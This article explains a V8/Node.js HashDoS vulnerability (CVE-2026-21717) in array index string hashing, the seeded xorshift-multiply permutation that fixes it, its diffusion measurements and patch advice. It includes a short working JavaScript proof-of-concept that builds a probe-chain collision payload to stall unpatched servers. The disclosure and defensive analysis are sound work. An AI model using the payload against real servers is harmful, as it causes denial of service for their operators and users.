The Optimization That Became a Security Exception: V8's Array Index HashDoS
Source: nodejs
Hash flooding as an attack class has been well understood since at least the 28C3 conference in December 2011, when Alexander Klink and Julian Wälde demonstrated that PHP, Python, Ruby, Java, ASP.NET, and Node.js all used deterministic hash functions for their internal hash tables. A few hundred kilobytes of carefully crafted input keys could push any of those runtimes into O(n²) behavior, turning a routine POST body parse into a minutes-long CPU stall. The response across the ecosystem was seeding: make hash values unpredictable by mixing in a per-process random secret, so an attacker cannot precompute collisions without knowing the seed.
V8 went through that process. General string hashing in V8 now uses seeded rapidhash, a fast non-cryptographic keyed hash function. A new process gets a fresh random seed, collisions in the string table become unpredictable, and the straightforward crafted-payload attack stops working. CVE-2026-21717, disclosed in the March 2026 Node.js security release, is the story of one code path that never got that treatment.
The Exception That Lived in the Hash Field
V8 stores a precomputed hash value in the header of every string object. For most strings, that value is a seeded hash: unpredictable without the process secret. For a specific category called array index strings, those whose content is a decimal integer between 0 and 16,777,215 (2²⁴ - 1), V8 instead stored a deterministic structural encoding:
hash_field = (length << 24) | numeric_value;
The string "1234" would always produce the same hash value, in any process, on any machine, regardless of the seed. This was not an oversight but a deliberate performance trade-off: V8’s runtime and JIT compiler use the hash field to extract the integer value directly, without re-parsing the string content. When you write arr["123"] in a tight loop, or parse a JSON object with integer keys, V8 wants the integer value of that key as cheaply as possible. If the hash field encodes the integer directly, a single field load and a mask gives the answer. If the hash field were a one-way function of the integer, V8 would have to go back to the character data every time.
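As a rough illustration of why that encoding is so convenient, the sketch below packs and unpacks a field using the formula above. The helper names are hypothetical, and real V8 hash fields also carry type bits that are left out here.

```javascript
// Illustrative only: mirrors (length << 24) | numeric_value from the text.
// Real V8 hash fields also carry type bits, which this sketch omits.
const VALUE_BITS = 24;
const VALUE_MASK = (1 << VALUE_BITS) - 1; // 0xFFFFFF

// Hypothetical helper: build the deterministic field for an array index string.
function encodeArrayIndexField(str) {
  const value = Number(str);
  if (!/^(0|[1-9]\d*)$/.test(str) || value > VALUE_MASK) {
    throw new RangeError(`not an encodable array index: ${str}`);
  }
  return ((str.length << VALUE_BITS) | value) >>> 0;
}

// Hypothetical helper: recover the integer with one mask, no string parsing.
function decodeArrayIndexValue(field) {
  return field & VALUE_MASK;
}

const field = encodeArrayIndexField("1234");
console.log(field.toString(16));           // 40004d2, identical in every process
console.log(decodeArrayIndexValue(field)); // 1234
```

Nothing in the encoding depends on a secret, which is what makes the fast path cheap and the hash predictable at the same time.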
This is the recurring structure of “exception” vulnerabilities: a security control is added to the general case, a specialized case is carved out for performance reasons, and the specialized case remains unprotected.
What the Attack Looks Like
The Node.js advisory includes a concrete proof-of-concept. V8 uses quadratic probing for its string intern table: a key with hash value h starts at bucket h modulo the table size, and the i-th retry advances the previous position by i, so the probe sequence visits offsets h, h+1, h+3, h+6, … (triangular numbers, matching the j + i update in the code below). Because the array index hash is simply the numeric value, an attacker who knows the hash function can choose array index strings that land on exactly those buckets in order, building a chain that a lookup starting at h must walk in full:
const MOD = 2 ** 19;
const CHN = 2 ** 17;
const val = 1234;
const payload = [];
let j = val + MOD;
for (let i = 1; i < CHN; i++) {
  payload.push(`${j}`);
  j = (j + i) % MOD;
}
// Trigger string table internalization
JSON.parse(JSON.stringify({ data: payload }));
On a modern laptop, roughly 2 MB of crafted input produces around 30 seconds of CPU hang. The attack is remote, requires no authentication, and requires only that the server interns attacker-controlled integer-keyed data, which is an accurate description of any server that parses JSON with user-provided keys, or processes query parameters, or handles URL path segments.
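The chain construction in the proof-of-concept can be checked with a small sketch. It assumes a table of 2¹⁹ buckets, that the unseeded bucket index is the numeric value modulo the table size, and that the i-th probe advances by i, mirroring the `j = (j + i) % MOD` update above. The function names are hypothetical.

```javascript
// Assumptions (not taken from V8 source): 2^19 buckets, bucket = value mod
// capacity for unseeded array index strings, and the i-th probe adds i.
const CAPACITY = 2 ** 19;

// Buckets visited when looking up a key whose first bucket is `start`.
function probeSequence(start, steps) {
  const buckets = [];
  let bucket = start % CAPACITY;
  for (let i = 1; i <= steps; i++) {
    buckets.push(bucket);
    bucket = (bucket + i) % CAPACITY;
  }
  return buckets;
}

// Numeric values generated the same way as the proof-of-concept loop.
function craftedKeys(val, count) {
  const keys = [];
  let j = val + CAPACITY;
  for (let i = 1; i <= count; i++) {
    keys.push(j);
    j = (j + i) % CAPACITY;
  }
  return keys;
}

const probes = probeSequence(1234, 8);
const keyBuckets = craftedKeys(1234, 8).map((k) => k % CAPACITY);
console.log(probes);     // [1234, 1235, 1237, 1240, 1244, 1249, 1255, 1262]
console.log(keyBuckets); // the same eight buckets, in the same order
```

Under those assumptions every crafted key sits on the next bucket of one probe sequence, so the attacker needs no knowledge of the process beyond the deterministic encoding.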
Why SipHash Was Not the Answer
For general strings, replacing the hash function with SipHash (Aumasson and Bernstein, 2012) or another keyed PRF is the standard playbook. SipHash-1-3 is what Rust’s standard library uses for its hash maps by default. It is fast, and its output is computationally indistinguishable from random without the key.
For array index strings, using SipHash would have meant destroying the integer-extraction fast path. Every location in V8 that checks the type bits in the hash field and then extracts the integer value would have to fall back to parsing the string content from memory. The affected sites include parseInt on strings that are already classified as array indices, property access on JavaScript arrays with string keys, and the JSON parser’s key internalization routine. These are high-frequency operations in typical JavaScript workloads. The advisory’s benchmark numbers give a sense of the budget: the final seeded solution, which keeps the fast path, costs 0.15% on JetStream 3, and going back to full string re-parsing on those hot paths would be considerably worse.
The fix therefore had to satisfy three constraints simultaneously: the output must be unpredictable without the process seed, the function must be efficiently invertible given the seed, and both the forward and inverse operations must be fast enough for hot-path use.
The Bijective Permutation Solution
The solution is a 3-round xorshift-multiply construction over the 24-bit integer space. Each round applies two operations in sequence: an XOR with a right-shifted copy of the value, followed by multiplication by an odd constant modulo 2²⁴. One more XOR-shift follows the third multiply. Both operations are bijections on the 24-bit space, so their composition is a bijection, and chaining three rounds with seed-derived multipliers yields a keyed bijection over all 16,777,216 possible values.
#include <stdint.h>

// Forward (applied at string creation time)
uint32_t SeedArrayIndexValue(uint32_t value, const uint32_t m[3]) {
  const uint32_t kMask = (1u << 24) - 1;
  const uint32_t kShift = 12;
  uint32_t x = value;
  x ^= x >> kShift; x = (x * m[0]) & kMask;  // round 1
  x ^= x >> kShift; x = (x * m[1]) & kMask;  // round 2
  x ^= x >> kShift; x = (x * m[2]) & kMask;  // round 3
  x ^= x >> kShift;                          // final XOR-shift
  return x;
}

// Inverse (applied on the hot path to recover the integer)
// m_inv[i] is the multiplicative inverse of m[i] modulo 2^24.
uint32_t UnseedArrayIndexValue(uint32_t hash, const uint32_t m_inv[3]) {
  const uint32_t kMask = (1u << 24) - 1;
  const uint32_t kShift = 12;
  uint32_t x = hash;
  x ^= x >> kShift; x = (x * m_inv[2]) & kMask;  // undo final XOR-shift and round 3 multiply
  x ^= x >> kShift; x = (x * m_inv[1]) & kMask;  // undo round 3 XOR-shift and round 2 multiply
  x ^= x >> kShift; x = (x * m_inv[0]) & kMask;  // undo round 2 XOR-shift and round 1 multiply
  x ^= x >> kShift;                              // undo round 1 XOR-shift
  return x;
}
With k = 12 on a 24-bit value, the XOR-shift step x ^= x >> k is self-inverse: applying it twice gives x ^ (x >> 24), and shifting a 24-bit value right by 24 leaves zero, so the original value comes back. (For a smaller shift the step is still a bijection, because the top k bits are unchanged and the lower bits can be recovered in k-bit windows, but it is no longer its own inverse.) The multiply step is invertible because every odd number is coprime to any power of two, so an odd constant has a multiplicative inverse modulo 2ⁿ; that inverse can be computed by Newton’s method once at process startup.
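Both properties are easy to check numerically. The following is a minimal sketch, not V8's code: the multiplier is a hypothetical odd constant, and the Newton iteration is one common way to compute an inverse modulo a power of two.

```javascript
const MASK = (1 << 24) - 1;
const SHIFT = 12;

// XOR-shift by 12 on a 24-bit value; applying it twice is the identity.
function xorShift(x) {
  return (x ^ (x >>> SHIFT)) & MASK;
}

// Inverse of an odd multiplier modulo 2^24 via Newton's iteration.
function inverseMod2Pow24(m) {
  if ((m & 1) === 0) throw new RangeError("multiplier must be odd");
  let inv = m; // m * m ≡ 1 (mod 8) for odd m, so 3 low bits are already right
  for (let i = 0; i < 4; i++) {
    // Each step doubles the number of correct low bits: 6, 12, 24, 48.
    inv = Math.imul(inv, 2 - Math.imul(m, inv));
  }
  return inv & MASK;
}

const m = 0x9e3779; // hypothetical odd multiplier, not a V8 constant
const mInv = inverseMod2Pow24(m);
console.log((Math.imul(m, mInv) & MASK) === 1);         // true
console.log(xorShift(xorShift(0xabcdef)) === 0xabcdef); // true
```

Because the inverse is computed once per multiplier, the per-lookup cost stays at the handful of shifts, XORs, and multiplies in the inverse function.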
The three multipliers are derived from V8’s existing rapidhash secret constants, truncated to 24 bits with the low bit forced to 1 to guarantee oddness. No new source of randomness is required; the process seed already exists.
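The derivation described above amounts to a mask and an OR. In the sketch below the 64-bit secrets are made-up placeholder values rather than V8's or rapidhash's constants, and `deriveMultiplier` is a hypothetical name.

```javascript
const LOW_24_BITS = 0xffffffn;

// Placeholder 64-bit secrets for illustration; not real V8 or rapidhash values.
const exampleSecrets = [
  0x0123456789abcdefn,
  0xfedcba9876543210n,
  0x0f1e2d3c4b5a6978n,
];

// Truncate to 24 bits, then force the low bit to 1 so the result is odd
// and therefore invertible modulo 2^24.
function deriveMultiplier(secret64) {
  return Number(secret64 & LOW_24_BITS) | 1;
}

const multipliers = exampleSecrets.map(deriveMultiplier);
console.log(multipliers.map((v) => v.toString(16))); // ['abcdef', '543211', '5a6979']
```

Forcing the low bit costs one bit of key material per multiplier, which is the price of guaranteeing that every derived constant has an inverse.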
How Many Rounds Are Enough
Choosing 3 rounds was an empirical decision backed by measurements using hash-prospector, a tool designed to evaluate the statistical quality of integer hash functions via the Strict Avalanche Criterion (SAC). SAC asks that flipping any single input bit flip each output bit with probability close to 0.5; the bias score measures how far a function deviates from that. A score of 0 represents perfect diffusion; a score of 1000 represents no diffusion at all.
| Construction | SAC Bias |
|---|---|
| Identity (original encoding) | 1000.000 |
| 1-round xorshift-multiply | 446.852 |
| 2-round xorshift-multiply | 3.447 |
| 3-round xorshift-multiply | 0.50 mean (std 0.20) |
Two rounds come close to perfect diffusion on average, but the distribution over random seed choices has outliers: some seeds produce notably weak permutations with 2 rounds. Three rounds collapse the variance, producing consistently near-ideal diffusion across the full space of possible process secrets. The advisory reports a 3-round minimum bias of 0.37 and a maximum of 1.68, well within acceptable range for this use case.
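To make the bias numbers more concrete, here is a rough sampled estimate of an avalanche bias for 24-bit functions. It is a sketch in the spirit of the metric described above, not hash-prospector's implementation; the multipliers are hypothetical, and because it samples only a few thousand inputs its results will not reproduce the table's figures.

```javascript
const BITS = 24;
const MASK = (1 << BITS) - 1;

// Sampled avalanche bias: 0 is ideal, 1000 means no diffusion at all.
function avalancheBias(fn, samples = 2048) {
  // flips[i][o] counts how often flipping input bit i flips output bit o.
  const flips = Array.from({ length: BITS }, () => new Array(BITS).fill(0));
  let state = 1;
  for (let n = 0; n < samples; n++) {
    state = (Math.imul(state, 1664525) + 1013904223) >>> 0; // simple LCG
    const input = state >>> 8; // use the top 24 bits as the sample input
    const base = fn(input);
    for (let i = 0; i < BITS; i++) {
      const diff = base ^ fn(input ^ (1 << i));
      for (let o = 0; o < BITS; o++) {
        if ((diff >>> o) & 1) flips[i][o]++;
      }
    }
  }
  const half = samples / 2;
  let sumSquares = 0;
  for (const row of flips) {
    for (const count of row) {
      const deviation = (count - half) / half; // 0 is ideal, ±1 is worst
      sumSquares += deviation * deviation;
    }
  }
  return Math.sqrt(sumSquares / (BITS * BITS)) * 1000;
}

// Hypothetical odd multipliers; V8 derives its own from the process seed.
const MULTIPLIERS = [0x9e3779, 0x85ebcb, 0xc2b2af];

function mix3(x) {
  x &= MASK;
  for (const m of MULTIPLIERS) {
    x ^= x >>> 12;
    x = Math.imul(x, m) & MASK;
  }
  return x ^ (x >>> 12);
}

const identity = (x) => x & MASK;
console.log(avalancheBias(identity)); // 1000
console.log(avalancheBias(mix3));     // far lower; exact value depends on sampling
```

With a few thousand samples the estimate has a noise floor in the tens, so distinguishing 2 rounds from 3 the way the advisory does requires far more inputs than this sketch uses.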
The total cost of the inverse operation on the hot path is four XORs, four shifts, three multiplications, and three masks, all on 32-bit values. This is faster than a cache-miss memory access to the string’s character data, which is what the fallback would require. The benchmark impact is effectively zero: JetStream 3 shows a 0.15% delta, within measurement noise.
A Pattern Worth Tracking
The 2026 V8 fix closes a specific hole, but the structure of the problem is worth internalizing. Security controls applied to a general case frequently leave specialized fast paths untreated, because the performance justification for the fast path also justifies deferring the security work. Over time, the rest of the system gets patched incrementally until the fast path becomes an island of old behavior surrounded by protected code. This is precisely what happened here: V8 seeded general string hashing years before this vulnerability was found, and the array index encoding survived because it was both obscure in purpose and load-bearing in performance.
For Node.js developers, the practical advice is straightforward: update to the March 2026 security releases (v20.x, v22.x, v24.x, v25.x). Servers that parse user-controlled JSON with integer keys, process query parameters, or handle URL segments containing numeric strings are the most directly exposed. Production mitigations like request body size limits and rate limiting reduce the attack surface but do not eliminate it, since the advisory’s proof-of-concept fits within 2 MB and would succeed in a single request against an unpatched server.
The broader point is that HashDoS is not a solved problem as soon as you add a seed to your hash function. It is solved when every code path that builds a hash table uses that seed. Finding the exceptions is the harder part, and they tend to hide in exactly the places where someone made a reasonable performance trade-off.